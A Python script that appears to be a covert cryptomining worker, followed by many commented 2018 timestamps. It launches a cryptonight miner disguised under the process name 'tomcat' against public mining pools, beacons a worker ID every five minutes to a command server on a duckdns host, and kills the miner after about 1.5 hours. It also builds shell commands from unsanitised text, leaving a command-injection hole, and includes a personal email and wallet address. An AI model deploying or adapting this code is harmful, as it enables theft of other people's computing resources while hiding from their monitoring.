import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:32:06.304581
#2018-02-17 17:20:06.953218
#2018-02-17 19:08:01.814846
#2018-02-17 20:57:06.103508
#2018-02-17 22:43:06.171878
#2018-02-18 00:27:05.927431
#2018-02-18 02:18:06.425580
#2018-02-18 04:05:03.100636
#2018-02-18 05:54:01.779218
#2018-02-18 07:45:03.890882
#2018-02-18 09:32:05.309543
#2018-02-18 11:18:05.056813
#2018-02-18 13:04:05.316682
#2018-02-18 14:54:05.327398
#2018-02-18 16:42:08.312135
#2018-02-18 18:32:05.490592
#2018-02-18 20:20:06.950258
#2018-02-18 22:06:05.515380
#2018-02-18 23:54:07.409023
#2018-02-19 01:40:07.675662
#2018-02-19 03:28:06.581797
#2018-02-19 05:13:07.423459
#2018-02-19 07:01:05.412785
#2018-02-19 08:51:01.711950
#2018-02-19 10:40:07.826909
#2018-02-19 12:27:06.991259
#2018-02-19 14:16:06.055620
#2018-02-19 16:05:08.709820
#2018-02-19 17:52:09.337254
#2018-02-19 19:40:01.427441
#2018-02-19 21:27:01.794278
#2018-02-19 23:12:03.838859
#2018-02-20 00:56:08.371146
#2018-02-20 02:46:03.705962
#2018-02-20 04:34:05.709015
#2018-02-20 06:18:06.296664
#2018-02-20 08:03:08.389399
#2018-02-20 09:48:08.112604
#2018-02-20 11:32:04.409733
#2018-02-20 13:20:05.830842
#2018-02-20 15:04:09.830846
#2018-02-20 16:48:01.920225
#2018-02-20 18:34:08.614260
#2018-02-20 20:23:08.271499
#2018-02-20 22:08:01.713210
#2018-02-20 23:50:07.650880
#2018-02-21 01:36:06.922533
#2018-02-21 03:23:08.435738
#2018-02-21 05:11:02.140572
#2018-02-21 06:58:04.872786
#2018-02-21 08:44:19.781811
#2018-02-21 10:32:08.263383
#2018-02-21 12:21:05.866333
#2018-02-21 14:08:07.919764
#2018-02-21 15:53:01.947212
#2018-02-21 17:44:10.269799
#2018-02-21 19:31:07.624994
#2018-02-21 21:19:01.253708
#2018-02-21 23:05:07.279313
#2018-02-22 00:55:07.920939
#2018-02-22 02:44:04.458312
#2018-02-22 04:30:07.410958
#2018-02-22 06:17:03.545686
#2018-02-22 08:03:02.056498
#2018-02-22 09:50:11.903876
#2018-02-22 11:36:05.910387
#2018-02-22 13:23:06.140959
#2018-02-22 15:13:04.170153
#2018-02-22 16:57:01.940427
#2018-02-22 18:45:05.896325
#2018-02-22 20:37:05.683207
#2018-02-22 22:21:07.845816
#2018-02-23 00:08:03.995572
#2018-02-23 01:56:07.293030
#2018-02-23 03:43:07.346491
#2018-02-23 05:28:01.342987
#2018-02-23 07:13:07.744273
#2018-02-23 09:18:06.336101
#2018-02-23 11:25:01.806194
#2018-02-23 13:15:08.221922
#2018-02-23 15:02:07.342629
#2018-02-23 16:51:08.714256
#2018-02-23 18:38:06.167068
#2018-02-23 20:24:07.367120
#2018-02-23 22:11:02.004996
#2018-02-23 23:57:06.391059
#2018-02-24 01:46:07.362409
#2018-02-24 03:38:01.475601
#2018-02-24 05:22:06.170966
#2018-02-24 07:10:09.667745
#2018-02-24 08:59:04.164711
#2018-02-24 10:39:06.473591
#2018-02-24 12:25:03.436543
#2018-02-24 14:19:05.495020
#2018-02-24 16:06:07.621155
#2018-02-24 17:57:01.601568
#2018-02-24 19:44:07.386405
#2018-02-24 21:31:03.900730
#2018-02-25 00:17:01.600796
#2018-02-25 04:12:07.051803
#2018-02-25 07:44:01.833522